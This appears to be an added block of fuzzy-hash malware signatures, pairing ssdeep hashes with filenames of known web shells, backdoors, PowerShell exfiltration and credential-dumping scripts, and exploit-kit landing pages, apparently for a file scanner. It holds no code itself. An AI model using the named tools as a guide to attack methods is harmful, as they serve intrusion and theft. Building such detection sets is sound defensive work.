+96:R+LcItThQhA/sb37DjVHbTQ+ScrQtuC6AgVKWb:R9TK/mVHZSHuC6AgVKWb,"Invoke-PowerShellIcmp.ps1"
+96:rKEWIFZ5qTf6QqAVIKDbHRpcJnZ1PPWnB0nzEWIylQMLMbMA11U+zLMcSPJbbAKJ:7Mg1YTRi26EWImQp11UmShbq6Fqd8IGv,"response.py"
+96:rK9BeipEj6hVlPo1TPc59vj42A/OVPRQTzab7NCIJ:u/xpEWVxITolHdE2,"com-shell-obf.php"
+96:rhetSQZ3Olrh/ZXn6hXn662tNOyXn69JXnsXnSg4GXn6vYKZRcZlqXn62i3ubd:roSQAhh/ZX6hX66AvX69JXsXSQX6PMTq,"test_file_bzip2.py"
+96:rFncujOj/4q0KSbfEb4S5FNRVSbfdbfSwFgMk:rFnX0/4q0KSbcb4S5FNRVSblbfSwFgMk,"test_file_download.py"
+96:Rf6GaFRO8ioyiFBSDTBdnQeYntk/Pn+im2i9NjT4U7yOOqs/4OkNMpPU3MKYU+aI:Rf6/Lioy4STQeYntkH+Ki9NoxOOqs/Px,"Backdoor-php-v0.1-by-Charlichaplin.php"
+96:Rf6GaFRO8ioyiFBSDTBdnQeYntk/Pn+im2i9NjT4U7yOcQkYOqs/4OkNMpPU3MKi:Rf6/Lioy4STQeYntkH+Ki9NoxOcQkYOT,"backdoor1.php"
+96:RDk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:pkpADxdaH/KWPcr,"index_bak1.jsp"
+96:rAAc2cOSoSxdCyJwRqsKgXRhT4zfw9QkK7hOdSlN5W4Xeb7QOw:L1RSoSXCypgXbMYKFfvPP,"request.py"
+96:r7etAQYtlrh/ZXn6hXn662tNOyXn69JXnsXnwg4GXn6vYKZRcZlqXn62i3ubd:r2AQGhh/ZX6hX66AvX69JXsXwQX6PMTq,"test_file_gzip.py"
+96:r6HitfIHu/Qi+GX8AfUfID72aNN0xxU8ZtSWsYYx8PcwlB:GbHBpGX8AfUfdaNN0HDIl7m/,"mailer.txt.001"
+96:R5KZntgdye9b7pe9b7ue9b73e9b7ue9b7rdkThGPHlgyxqZV0/GJGuD2ue4gLtRk:R5KZWdx9Q9h9C9J9tkThGmyxqZV0/GJV,"Port-Scan.ps1"
+96:r4Zww2fAJpsWGbhnoMOpyx/YeKoF7JPiTCos7RS9klzO7wMYNswteDLBssHyLTDm:lNA8F+pyCscxsNOUMYNRPsHyLD2eCp/,"2016-06-02-cbat.or.kr-index.html.txt"
+96:r2iYI59bc1H3F9JLhfqZM8YD9VcDJcr0He4JSJ26bNs9OpRyu1EohKpOPBSOsqEo:r2iY49bc1H39LUQ8uIH7626ps9OpjY5K,"class.rand.php.1"
+96:r2iYbIZqvMbD9VcDJOr0He4JSJ26b3s9OpRt1EohfpOPBSOsqE7O+5tS:r2iYbpE8oIH7626rs9Op9n5fS,"go.txt"
+96:r2iHlq5D/PMD9EFDJNU02e4JSJ2u25eL/vYqCy6zrN9eRZ/q1EHh5dODMa8:r2iwCwL92762HecBt9ePcm,"foguete.txt.001"
+96:r2i7ZG5D/SkD9VhDJ/02I4JSJ2u25e2/4YqCZ6zrN9eRG1E/whVdRI5x8:r2iwhRm2x62Hewyt9eiu8,"01.txt"
+96:r2i44pYsDKrDJNz0HC4JSJv6qrHSo8s9360I3gtKro/Az59z8:r2iScmLQH36v6en9wk,"olas9.txt.001"
+96:r2i44pYsDKrDJNR0HC4JSJv6qrHSo8s9360I3gtKro/Az59z8:r2iScmLCH36v6en9wk,"9sdsu.txt"
+96:QzD4wznHsDy19pSOm2LqDM+fPH/bx499XWMCoJJ/Te:QzD4wznMDy13SOmV4ebxTMCSTe,"cgi-python.py"
+96:qQyrf7SL5lk2+kt4+J7NghbWwM7Iu8BbHifytuzcC1JoTkm:qQjW2YvN,"2016-07-19-page-from-naprawaokienpcv.pl-with-injected-script.txt"
+96:Q/qFi8VDH3vg0Q3ZDg6Wch+gVxb/1MKTsEP/u0VenA7+uiTrslxugokxGwSjOTk9:PiODHbQ3hFWcIgVpNnsEu0VeZzk4w7S/,"bt.php.202"
+96:qpuLYqVz4RSdTWjJyRg4JPlLoLKBgI/j/znEPrDXRAnvhCN37tOwujxvMJVmJdPY:79z0rj4vLoLw0nXRwZ0ROZ6cOL,"bt.php.96"
+96:Qiv3fBVt9MTgcJgrygL4oH/tVXbqwarjBWRAFYwWemEZgq74xcfFvo6YaXW+c635:Qk3frtCkcixcoTbqfANemmZMEFvo6Yah,"ob46.txt"
+96:QiHdt8LljysDwYwAuJoksPnTywuLy2uZyXuPA1xyrkNB0hKn:JHdt8L5fn+eykA1D7fn,"audit_null.patch"
+96:qfI62mwJzQ+8g4DH1ZFDIKsKuI2dzsKuIq5dzsKuI3TZK6IPbmIH1dx3urIl1dTn:qfItz8dUKsKHusKHq/sKHjAjPb/HHx39,"WinX_Shell_by_greenwood.v1.0.php.txt"
+96:QeVlDgd+1FRXd5WufsRg5JWJ1QJ8hfipQXk+fDlGbvCghGeA5DceVAesyldD3zCV:QeXDgdeRXdpfrXO1QJ8hdkGHK,"brain-spam-mailer.php"
+96:qab+FzJdMzyowVZn0QWI+PGHXAlup3YpAup1ywpdL:HbAzHVrB0QWIPHQluWpAu+4t,"_implementation.py"
+96:PTqVYUNrsusesKGns2sNEF2C2ZnjTglhVxVtgFrgd4Z00gliGxGegFSgdv:P+VYFTDKGshNEFf2ZnjTglhVxVtgFrgA,"test_file_find.py"
+96:PTqVHDcSUU+GVR92YvrPrYP/UyCqXUpIqGB9rIjLyo+m:P+VH4SUU7VR92mrPrMc8k/M98Go+m,"test_file_upload2web.py"
+96:PTqRxYA0grKo4nZWZOcIbUb9R9xd/lUXxhFjXxcUXxm7eXxs2L4pibOQwiwJp:P+RxYA/mo4OOvUZR9xplUXxhFjXxcUX+,"test_file_zip.py"
+96:PTqhxYg0454vZWZOcIbUb9R44Jd/JD0wXIV59rnXxM0nXx2jCnXxs2LMJUbOQwJX:P+hxYg/542OvUZRlJpVZXO59rXxMEXxE,"test_file_tar.py"
+96:PTq3fYUNrsusl42NEF2CDDvwjSDwsSD4SySPS4:P+3fYFTlZNEFf3rmv,"test_file_enum.py"
+96:PRy49z2F7/UTJnJf3KHVT9osquRTuEon50h8piTijJnp7L:NNFJf309oMkplV,"f0x.txt.002"
+96:PRy49z2F7PUTJnJf3KHVT9osquRTuEon50h8piTij5np7L:NLFJf309oMkpVV,"f0x.txt.001"
+96:Ppj4hnHIv0pEYt4df5j1h8r+CDMFDJWFg0HO4JSJ26i09EjRJbRG+31EompdFrwD:PpuHIMpEfdf5j1h8rvaIHL626X9Ef5xr,"1.php.002"
+96:Ppj4hnHIv0pEYt4df5j1h8r+CDMFDJWFg0HO4JSJ26i09EjPJbRG+31EompdFrwD:PpuHIMpEfdf5j1h8rvaIHL626X9EF5xr,"1.php.001"
+96:Ppj4hnHIv0pEYt4df5j1h8r+CDMFDJWFg0HO4JSJ26i09EjHbRU31EompdFrwSMn:PpuHIMpEfdf5j1h8rvaIHL626X9EfSxr,"1.php"
+96:pnAtE3qOUUKURJnJKa3K+9ERluEonf0h8piTiT0g:pnDXBvJKa3r9Eel,"x.php.4"
+96:PHKd7K3vT8c6+Sbyrokg3njk4Db43VkyrnPL6DbLyryrP0163RAb+NSd3c/J/q04:tD6+wCyM,"info7.php"
+96:pcmfnpFxK8CetN0BmuIjaIXt6OLPSBoUmw7hosRm8s+uwMJjXmdwMGSSkP4Un+df:7fbI/e1uDIMoPCmens+YJjXCwkSWTux1,"bt.php.48"
+96:P5CmhD7C291OIJb8EJFlJYc3Z8C/ebghsfuLRdmJGnh9r:P3hD7dLkiFlJYc3Z8C/bguCGnhN,"2016-02-11-security-blayadama.info-megaadvertize.htm.txt"
+96:ozS1wXT/k+yVMl4Wzo5HBlWboG25i67i5ixPTbj6kip0BNLz7p4rgrHfe6IF2s+6:oeIiMLwhlI67iq6pDbzf3mx5WDZ,"目录扫描.asp"
+96:oYjRW9FONRQtkz/g6oNJ6NrKhA/YhF9i5PjZKUc1xWmzD6wlv1Gv4xhcwJ2H854E:o8IMzi6EJyOidZK5nTltGe4fYY3sGm,"bt.php.238"
+96:OyA3MQn0nl0mu8B4BfaLb6Jj7flCHpXZrlC68WU718IqyJkWGe6Dejdc:RMal0gB6aLGF7flCJXZrlC7189k+DQy,"user.jpg.1"
+96:OtA7pZjSZyB2HGCcCA23R5fNq42rynFRh+PONB688A:OM/B2Zf3R+42Uh+PO3X8A,"cilik.php.1"
+96:OsAChTwTyFuIMBb5LElxMaV66jSKwSvGLZPvUP:Ow8yEI+b5cKawISYE5UP,"Execute-Code.ps1"
+96:OqcAzq489ia5gffZtB7CpSQ8u/23LNe5le6VoCow6xKCiNFY6:OHh4Uia5gfhtB7CpV8uu3LNe5lapxTv6,"WMIBackdoor.ps1"
+96:oQc6aWYN+NatELG/pK/9onDG36iAn/GrihPcnsIKGqZ9jPboUmRGWxzvG7xN/ZPB:oW0+0wybh5Y9QQQAz5Br/ArWm8VkMK/,"Marvins.php"
+96:Oo56s9mLF/A8dCLK7idHCiKiWLmfJvv3I3/XCjHeQc:r6s9KQKMCiKVifFv4PyjHeQc,"RemExp.asp"
+96:oNwSFm5KyBMm0ZlagqDoFoKgAyLd4Yy2PI2oqI2Z2I:LSFNyB50ZlJGKgzLmYy2PI2oqI2QI,"shell.aspx"
+96:oNwcFm5KyBMm0ZlagqDoFoKgAyLd4Yy2PI2oqI2z22:LcFNyB50ZlJGKgzLmYy2PI2oqI2a2,"Laundanum ASPX Shell.aspx"
+96:oLzpD8oG6KN9CJnRnNBoS0LMxS0Lh9BlS0Lw:UhFNKN9TnmnFXlnk,"ob3.js"
+96:Olog6hEjO4v0LGVNSAbkDd+AzdjTWHxUkL7/8qz3dTp6H9WF9LTA5+Ma:U4hEjOKdiikDd+SdjGdX/8qz3dTOWnTr,"details_vpFvEE.js"
+96:OL1urizFWPRQgkz4RvKftfQNfxxzljFkxFR29UiD0V29te:OMrIFWPR+zwvKftfQNpxRjFQFGUiDfte,"phpdisk-sql-injection.py"
+96:OGOLmlRQLmc6he2QECeW+zKyfVWXFzSJf2+kOp:OQlmL32tCeWMKGp1oOp,"ddc0b628bb6c0360c9a369f0a1803f73_php.txt.orig.001.001"
+96:ObTjHUasJGHVzI3nL40kyVocdMoKlHWVo0EYV/36M3d:GTjHUoHVzI3nL4kwlHWVDEYV/3B3d,"php.py"
+96:OAqoxdxhvsCz4VIUiyneiN+C6NrwKNuqpX/F/IYgWeiNqodItW7qWDUZj/2ta97U:YoFhsk4VpiviMB1NuqNmYgPisWIxwK21,"2016-08-19-EITest-Rig-EK-landing-page.txt~"
+96:Oa4qyT7SO+PnF1eLufK+Ogjig+uXzgpT4O0MPr3Q08bv9oopOdB4+Tp8r2YiCDbI:5yXSXvFw+Og2g+uDgyO0M0TpOTJQ7ED,"2016-03-02-kiwitemplates.com-core.js.txt"
+96:o50rcyaAph3pLmiLtLoms83wMDFzMI6YUfjFZtn4cHuQTyhzHoQliKwQi/7nVsLv:/rD/mEt1SI6Ymhn4c36TKDV3aRfrqtw,"bt.php.139"
+96:nXAR5ZVeVagzXiQ2xoJEaEQ+k3Om51lol:nQRl5g+KJOhk3plol,"xeuoxuii.php"
+96:nvuGsWs2SJqhVp3P9WboJFPcQAAokDjKGD:nvvwkTD,"vscqznyx.php"
+96:n/RotIScQYaPAvU4G8ycHmFHZjPg0H7QHU38tWHRitWmlVtftWHVt7HkitMU1cQG:n/RIcQYaPAc4G8ycHmFHZjPg0H7QHYJY,"50beb18ca26e5e01ab5f70d461b3b5c8_php.txt.orig"
+96:NrNwFm/llhNKjTbPmvfIChSYT0dwROmDaDEw1AORcn2S:NyC74jyjTnOkaDEw1Vc2S,"dns.asp"
+96:nRBffWY5W6XJWpoEnAIBKWPWhKWjGcWN4lqhHU:nRthW6XJWpoQAGKWPWhKWjGcY4lqhHU,"themes96.php~"
+96:nqI6d5wrSOV1O44oFbMwbx3Zxi9Iw074tQg0oMIq2R6J:nDVc8Ow9pxi9Iw0ktDldJk,"press.php"
+96:nQFfl8qw0cbkv1Z6w4DI5NXlz/AsJIr1Idp86AeQ:nQ/8qQiZ6w4DIHJ+1IzdQ,"joomla_verzkd.php"
+96:Np3g316aquA3B2WnEzKNpB3yOQymQObqG0ShH9h2j6Dzdx2IFx:v3QUaqVsWnJxyOhpIzH9hhZx2I/,"2016-08-11-EITest-flash-redirect-from-baseh.top.swf"
+96:nNlnXv3oPNi8aMoIicuB++12p0B3JnAZBK90FoUvgAxch57IHJ8bfH6SbmT+TbMf:nNlf3Yn5FrJKPC0vtT2,"svzbmcgu.php"
+96:NNeIMzNlkvBzOBkWMlPQ360Aa3d23o6+ug+44qNwsW6rq:yLzOwBmPQ3j3h+xZs5q,"document_JGshsb.js"
+96:N+MnJ14MJqtyhBaeD7BTBMAVeRydKAck7ZeRP0H5tBBe:N5J1FJq+ae5tyyMAD7SY5LBe,"VirusShare_a8e7bf7c6bc81ced10f012f7b99d6d41"
+96:nM+Ig5M+V1FTqiPXtN0jsp+7s8tL8qsW4CkU:nM+x9Uop+7XtLOrU,"config.php.5"
+96:njNRh/Iks6W5xOqtckdG/3W6+5ShERiEQ0tq0OrE9S/1k+Q0HziDOGU:njFDXgtxGfW6qjUqtq0Di19Nzis,"footer.php"
+96:neN5XqUlpEV4JehOnouo0kskLP6/Jm7JZdqd8pD:neNRHMLhOnou/kskLP6/J2JZcGpD,"view.php"
+96:nbhMteR1vh8AFQ9q1AkVEXw+06eUrpQX47DAS5gYmKf8I:bhA4h8Hdn06Z9QX470NYmuZ,"letter_IBoOke.js"
+96:nAutYa3ypnReQ8Sjbwi0G/9w5wOqEGiwm6dPgHkweS/NEROeP5HgtCYhXNf:AJDzwiR9tOqEKRqeSY34,"wt.asp"
+96:nAiPJ9FKxYZ0TqluLpZYUyMt9rhDzapvfa8AfkxxyE3BiGC8ucvNUN54jz:xPjBZTluLrYwt9xzap5Ac7xiGCTeaHU,"79012798721987934.php"
+96:n3UY5eYIXHVDR5tVx5uo5O/XGARLJAenUSC+vVbwlR5:n3P5eYIX1DR5tVx5uoo/XU+velR5,"index.html"
+96:n1u9yj+pBjjLrdvA6g/SyIb5LSMZ6GVogvaab:nc8q9PK64LIb5TZ1jaab,"Execute-DNSTXT-Code.ps1"
+96:N1C2+wp4YWhf41/MNrS+lPNEiXFPSPSYqDOSQ5P2VgeIm9/CkYpK9rxlpQ93:I41EVVlPNPXFPSPSYqCSQ5Pwg3oe,"Start-CaptureServer.ps1"
+96:mPzirbZJmeBLo7kdhGoxNw/zF2+R1tIsce+8:mPzirb6GLQGFGzF/Ie+8,"postgresql.php"
+96:mNPsMNTS5aI0X5+OihxbYYshZreNOD4nEBKKsvWfP5Vw4+cnzN5s06LMj5za1lPX:mPNCKX4V9o1yo5J+DM9za1pk2kU,"invoice_copy_aphYzz.js"
+96:+mnENdRi/Eh6HtdilMl5NJnkn0FP/5Rvn+:pENdR56HSlUyM+,"2016-07-15-Gootkit-task-for-persistence.txt"
+96:mL4Euk5vfsrY8gViyDhIO+/M2gOqFNxEEz:mLbsrYV1Dhb+/+OqFN9z,"hmass (priv8 mass defacor).pl"
+96:MJqj8A7A47t3pBtjT8RFRtTaLpATo27elaZzv0jJFMUC:MJK1AW+FS9sAEAJFMT,"cat.jspx"
+96:MfqWKUv6s6a6s62bZqu/JJVHnudUsvaSw44DyOji9Yxy+qqs4Gc+rvo:MfqWKw6s6a6s62bZ/JhudX4Dlj0Hcd+0,"oo.jspx"
+96:Mf12v6s6a6s6+VVHn3MnaSw44DyOji9Yxy+qqs4Gc+rvo:Mf1i6s6a6s6+ru4Dlj0Hcd+0,"jspx.jspx"
+96:meipmsXdSB4sWgAK9c0zrvVliw/g7uauF/ZOB/F/ZcF/ZF7S7DF/Z+f5rIDn3GPh:E/XdSB1/AKbr9AL7uak0QbIx+7ME,"bt.php.136"
+96:mCUSjQobFJMwVeVfvyWR9Y+1Ol01O2pHFOh/123v6:LQwgfvyWR9YlcS12/6,"amasty.biz"
+96:m/bfCskLenDP5q5fhdYRIQYACAk6AtuPyAkSAkRAAaAFA5ATAcAnA7ApA0mAvjdj:uvQ5YL1kt8kFkKIOysvAUi0JvjdeqAgj,"company database.msg.eml"
+96:ma/dAedsQa3aEH/Tx+d4P2Fu74+ntTh6A:mVfk4Go7h6A,"mysql_1.php"
+96:m7zUUpmvhtMczoTA4y6IvpQKOQXEOCiRseOdogiXOFmqEsq:SfpohrWEuK/RjseOeXXOhG,"accent_ybhvtJ.js"
+96:m5qjFPKc73njB7TR1IHDX8ThO0Kh8LVLsL1LS4qQUQ:zxrRR1GXMhO0Kh4M,"f.php.001"
+96:M1yNOt7fGsc5kXSaKYBByK2Riar3qc9f24Jk0k7htFZSKhqyq3Yo5Wzmm3Oj2yKM:M1yEtXcFaXQKAia/J60gtPSIqykfWzmb,"tunnel.js"
+96:lYZ85D/S2D5VFDUI5hHR/la+ZsfJCJps25ek/sYqCZ6zrvJmR4VEWT/zJOnLzx8:1PJUcD/+KplecyPJmUp2O,"envio.txt"
+96:ltnEiks3RTAQFW/FoZBPxTHATO9AQFW/STAQFW/BoZBPxTHATO32Va9m4p:fEfaRFW/FOfHATORFW/AFW/BOfHATO3X,"2016-06-10-Rig-EK-landing-page.txt"
+96:ltnEiks3RT1znIsQSr4jjkEykNTQ9go4paGXa9m8p:fEfanz/47Y+z0m8p,"2016-07-08-Rig-EK-landing-page.txt"
+96:ltEEik3GpGNY4kzcFW8tolK9d+LUIYYdnpQOYdMZAqu/9aIUZi3Da9m8p:8EfgGNfFW8tX98TD4qalws0m8p,"2016-06-20-Rig-EK-landing-page-after-monavocatparis.fr.txt"
+96:ltEEik3GpGNY4kPhYmxlZWd3jXYVjr3vQXXFWth9aIQP9jZk3ia9m8p:8EfgGNWYmxGVSXaFWthS9Fk3vm8p,"2016-06-20-Rig-EK-landing-page-after-chipdating.link.txt"
+96:lp63k0TL5oLidxs7MmG08lmNn/2o3/zzkJtnunYyEkJt:lp60gLCudxvmG0VNnx7yeYyEg,"meter_rev_http.cpp"
+96:LmVwU7+Sk5tFm2Az4p/ya1UoylgaVqThyu0fYOxW7j2soetMyIYUimbYpxhRwPZX:PU6V/RC4dpDj2MOyvjvCP0E/Bisr,"Get-LSASecret.ps1"
+96:lLVt9MTgcJgrygL4oH/tVXbqwarjBWRAFYwWemEZgq74xcfFvo6YaXW+c63Gc3g4:lJtCkcixcoTbqfANemmZMEFvo6YaTSOR,"98ae9123a25a31c7c97e147585456cba_php.txt"
+96:llucfkwC6vOqULW1CiieSvKhBgcEZ35q5vm2n6DKg18HDuy4CV:lgeCdqUOCHewJV2n/ZKc,"2016-07-29-EITest-flash-redirect-from-tyjutu.xyz-and-ypabodid.xyz.swf"
+96:lgM3NXHoA23MDRdbRj+H1pCt1Y1CoEuGYH6GN7HTSRCQL1kdQch:lgMRq8DfbRjbt1Y1CoELS68EL2dQS,"Backdoor.ASP.Ace.dm-花儿之家c2004.asp"
+96:LFejW+rEsOEm0A1AwXVkpn/KduRgtP0jKjSHEeRgCtxkJB4GBGDbW:0j8sOEm0A1pkpTgtMGjwEcgKxk1MW,"PHP-Shell-offender-v1.7.php"
+96:LDshUKsx3Rzl77sUjZs6Xohb58Vl6mZeBS/gU7e:LYhSZJ7sUjjYJ5QZeBDL,"phpspy_2005_full.htm"
+96:L9HYUglD/VyywmwcCDoY9kXJlm8W7NHigkta6nrt2W1YpXLQ2zNzjmSAImB83cS+:VfgZ/wmoDDBDs46r6pXLDN/mSUBpSdaV,"kc.php"
+96:L8lwKq+jBISfu/FqeB4Yll2xQg4JbEEI8UMCeuPYoCsEPIqdCgh4usn:L85BI/FbB4Ol0r4FdHPugPZVh4usn,"Utils.java"
+96:l6Eik3GpGNY4kxkKFWJUw2xlkdYLK1xkKFWJHxkKFWJdw2xlkdYLKBia9mMp:MEfgGNIFW++mIFWdFWf+mUvmMp,"2016-06-25-Rig-EK-landing-page-after-southcoastdrones.com.au.txt"
+96:l6Eik3GpGNY4kjFW2z/FFdKkI2jQgRZ1bF9aI6oZ163Da9mMp:MEfgGNsFW2z33ffbFV1E0mMp,"2016-06-26-Rig-EK-landing-page-after-southcoastdrones.com.au.txt"
+96:l6Eik3GpGNY4kGFW/FAdQvL0IpDwXXXQnDwXXdZok9aIPPZu3Da9mmp:MEfgGNlFW/FAE3wXuwdjxRI0mmp,"2016-06-29-Rig-EK-landing-page-after-glamgirltube.tk.txt"
+96:l6Eik3GpGNY4kCFWTlvWDmd9TuWCFWTlnCFWTlJWDmd9Tumia9mmp:MEfgGNdFWTlvWDmeFWTlCFWTlJWDmzvZ,"2016-06-28-Rig-EK-landing-page-after-monavocatparis.fr.txt"
+96:l6Eik3GpGNY4k8xhYcfDp5bdUkVIxRFWF8xhYcfl5bdUkVqkGXa9mmp:MEfgGNFYWNNuFWgYWlNyKmmp,"2016-06-29-Rig-EK-landing-page-after-gate-on-45.32.187.36.txt"
+96:l4NoVMYSRMlZ3UGbvlacHV6zXzlV1QUyKNJRP7zzB/SCwvv:CNoVMYgMlZXbvlacIXfOpKTRzzzYCwvv,"Remove-Comments.ps1"
+96:kxLSKD2D5NYd/5fwdqokF7bApScciuXRStOddxP4zncduKJu/:0SYkz0okFNccRGYyKc/,"fields.py"
+96:KVHRu7Ex+M/943aU8UBuDBraaj10w5YvIsz91+7xBrn:KVH55/940UBuj15qIL,"report_qvThfu.js"
+96:Ktvl5kt+hz1hpYNgv21uN2MVgkFkEGgdlnXaGuYRkU5XgOFbYuSI7RSaOjn2hMsI:Kt3hAgdcGV5Xgcc1EKn2KkYwE,"32bb4a3c330338128f672e6a1741e527_php.txt"
+96:kM+LuWqC6vojRTs0Ha4sp+7s8tL8qsW4Ck5:kM+f6QNIWaHp+7XtLOr5,"config.php.2"
+96:kJ/WPsWISXGEydcen2TgRTj1Zgris3E2U9pF0AW630H74BIX0Bimb8N:COPvIS1ydcenf2rfUR/a630bjt/,"bt.php.163"
+96:KF+Q+oHAWpuyPqrz6bQBIZuMCX8FLdLpNOiwJCmNYLNayeDEySA7biXqpZfzfSTX:KkOA1X1iH08FLdtsCm+WbniarfzfSL/,"BNKQbAKQ.txt"
+96:kFju08MBWuP8L+YcJNWlMXOXeMGkeWMNK+Fi7YW8:kmXMXOOTv/A+Fi8,"DynamicContentParser.py"
+96:kEIpVAdw+H19T27yDUMLnWlub1Gc+oqgyVAXh/UJYPTNEeIjrFeaw1zcTHP7/bD:kEoOdHRDzLWUbAc+/gyVAxgT/X,"index.php"
+96:KcgCWQbEZXMEsU28OMJ/ps2I1WRICwNkGZIq0RkZ2TmqA9VAu6bN1l/iiL0L/es:JWfcs287/pVRICgkoATmjHAuuNjacW,"bt.php.181"
+96:jzya0AN92cuvcjcl/KnUIuYglUdgyKXRJOiSCy2iSo76iSoC7H:jG7uI9U4KUITglfyKXOiSCy2iSo76iSF,"从注册表中读存在路径.aspx"
+96:Jz/AUHdwAzZkt5Nn53xIWjtYmM0OvwJ4hHQdBCWBAmIvuH1xU3:R/hdwSkt5NnT3tYmHQwugad,"report_xfGUmj.js"
+96:JyfBoE6SdlVIee80wUwlkvXuLteB42Y7R9IhEzxoF6qFgusU/HwpP32POTd:JyfBFueeTvXuLYB42YnCEzxofeusU/qD,"rip-svn.pl"
+96:jvBFPUAqautmY6CriZAc3V//43VRYI3/LY:jvDsAq96CriZAc3B/43/lPLY,"pHp一句话扫描脚本程序.php"
+96:JSljzEGiqK4tG1yhJ7HRNRtbjkKVkYEw9UyAPWb:4BvtGMzHRNRt3kKKe+M,"Prasadhak.ps1"
+96:jpVqrUG7Nds+rBDHg2eiQOIvKDsPLqQoFEEXANmhQNElJgQ1iR:rG7NpFYXO3A0aXNmh/KQ8,"findsock.c"
+96:+JoM0V5esBr0k5kxeNu6yBEvpNfzWVIoe0vqNkV+S7OWNqENnwG9w7S4:+mVAsBr0klNuvU4e+0NJENnLq7S4,"doc_iMXGLN.js"
+96:jOe04+Owv+OCV7zGSt1VSBlqAwUJDRNKjWneWAbWLZ+cFpXkIl4QGZYagnhSIXz:aeZwWOCV7zGStiHqiT4WneWAbWLlFKIf,"aspxshell.aspx.txt"
+96:jOA1tyHW+nCT0pvkiY2Ut4kVNMitU4UZKjY2/UWt527UW8UAWicp7OFbUloAdo3p:a5HNnC4pvTytMZAUWtkUW8UAWijhUrdg,"aspxshell_by_LT.aspx.txt"
+96:Jj2ZIsVAqk8lblXf/Y7NfWNa3eMcQvWyCTInVS7Bgqjf73o5uq2FrUCc0akOD5Kw:Jj0IaAWrV03eMWA2TT0WDnWY6,"sql_getDB.txt"
+96:jiL8OfuBqVmQT503hS4Z1CCGiEiCi3KL94M98NS4Z1CC4/SfMAtdK2yS4Z1CciR0:jK8Of9V/aQuCCGiEVi3Kl6MuCC2SfZuR,"tunnel.aspx"
+96:JhOO6S9mONvqajU+pPiuVd1edCecZwOghAMKRAE2uZe5ooIgO2Wi0E6kX1wMz5nE:n5T2aj9ZuCXiOghOJe59OzGX2Mz5nE,"bt.php.120"
+96:JhEtXx7gJCrQJZpLVPLXLjLgLJL36lc6gNgbaxCr0+5dS580nRJZXBSxnDoVfCrA:JheXdgBbWrgaP+5dSlDDkDJSdS1WIlIH,"Safe_Mode_Bypass_PHP_4.4.2_PHP_5.1.2.php.txt"
+96:JhEtXx7gJCrQJZpLVPLXLjLgLJL36lc6gNgbaxCr0+5dS580nRJZXBSxnDoVfCr9:JheXdgBbWrgaP+5dSlDDkDJSdS3,"Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt"
+96:jDL9zZWFNQDeWjyWi+GCVnyNfelvMY3v3Gpatd+OMDehlVWUmqmUPjJiDG:vpZew8+9VyEtvZNMD+mbG,"php.txt"
+96:jbUr28fmNjKGlk2+kt4+J7NghbWwM7Iu8BbHifytuzcC1JoTkm:Xg2XW2YvN,"2016-07-20-page-from-naprawaokienpcv.pl-with-injected-script.txt"
+96:J+B+112k3gX6ER6s96donZ2MqKw+a635vDKHPECWUvZXDiJ6DWKWCVnOBm9Cg7:Jsu12kQqxz0Zml+JvDK8CWUv5DiYHXVL,"Do-Exfiltration.ps1"
+96:J9uGszzYvFm8A9pTkOfrOub7Xh0W4UXX5nSpex35YUOGZOFvk:J9ux+FhYpTRJbrhb/XX8s3UGZf,"doc_BVjrdp.js"
+96:j651Pu39+JFq5o3CqOBb4g3RO3tyN3tUll4yXs:OA0aTqab4qG4yXs,"Out-Shortcut.ps1"
+96:j5SSjX8u1+0Fx0iru1SSdyo38Sy3rU9/MNsCiru1SSoWifMftyy8Ghru1SSqyW58:jRfrMSSdyo3Ty3rPa1MSS3ifilVMSSqQ,"tunnel.ashx"
+96:j4IvEqYyMa2DJyjXIRKDeWo/nym3rVuIw24hWqvlM2Eiii5G:j442DJyjXIRKDvo/nymb9wxhWqs,"index.php"
+96:iZqvLeK9FphN3Kl/8qk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GX7:iZqv6K9FphN6hDkpADxdaH/KWPc7,"index_sys.jsp"
+96:iyk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:FkpADxdaH/KWPcr,"edit_ot.jsp"
+96:iWk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:5kpADxdaH/KWPcr,"maint.jsp"
+96:IVzZjp+glHLT0jZQawXmT0FirLR8tgjKxfH7zPgRuh0qQB4TrvDXf:6j9lHLT0jZQQTcc8tgmx/7DgEh0kLf,"a.php"
+96:IvZMKeX0USYsQadCr3KSe6J4hXda9PRG4cgcXdQ7Idp7:mWgdl/Ogp7,"啊D小工具 - 目录读写检测 [ASP版]说明.txt"
+96:IvMX1hnXKcm4WTYLHoXfYp2HeelpaaTLKcm4WTYLHoXfYp2Heelk3:IEbKcmmLHoXQneTaaTLKcmmLHoXQnei,"weird-10.php"
+96:iuk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:LkpADxdaH/KWPcr,"JSP菜刀一句话木马.jsp"
+96:iTzRjsrIgYKazx2gj1e0j4d3DyxTtbpV0xZIWx0e/bfR+4GZY1cmjMZy3T2:kNsUx2gjvQ3DyxTtbp8br1TncmjMZy3i,"utils.jsp"
+96:isk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:RkpADxdaH/KWPcr,"caidao.jsp"
+96:iSk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GX7:RkpADxdaH/KWPc7,"indexop.jsp.上传.jsp"
+96:iQzRjsrIgYKazx2gj1e0j4d3DyxTtbpV0xZIWx0e/bfR+4GZY1cmjMZy3T2:9NsUx2gjvQ3DyxTtbp8br1TncmjMZy3i,"jdbc.jsp"
+96:IQax1+cq1trbGLH/8wkE3MKFz7j+71ujnF4+DbnTjVB/iWa+x4rZvCRflH5vdVBO:IQaxcflO/Z3FzvfFtTXhMlvCflRn30,"bt.php.78"
+96:iMk2+XnEyGIaOTepxDljaHn/KSXAPXSta+GXr:lkpADxdaH/KWPcr,"ice.jsp"
+96:iLzRjsrIgYKazx2gj1e0j4d3DyxTtbpV0xZIWx0e/bfR+4GZY1cmjMZy3T2:cNsUx2gjvQ3DyxTtbp8br1TncmjMZy3i,"customize.jsp"
+96:il2v6s6a6s6JIMHniMCiaSw44DynjioFxyRqqs4Gc+rA:qi6s6a6s6JL224DWz0ocd+s,"菜刀jsp脚本更新版.jsp"
+96:il2v6s6a6s6JIMHniMCiaSw44DynjioFQyRqqs4Gc+rA:qi6s6a6s6JL224DWz3ocd+s,"菜刀jsp脚本文明版.jsp"
+96:iKcfx9RY6uxy58kA3GCjDhA9WAKj/pa7a7k588Z:idvO6uxy58JxDh1/c8e,"Out-EncryptedScript.ps1"
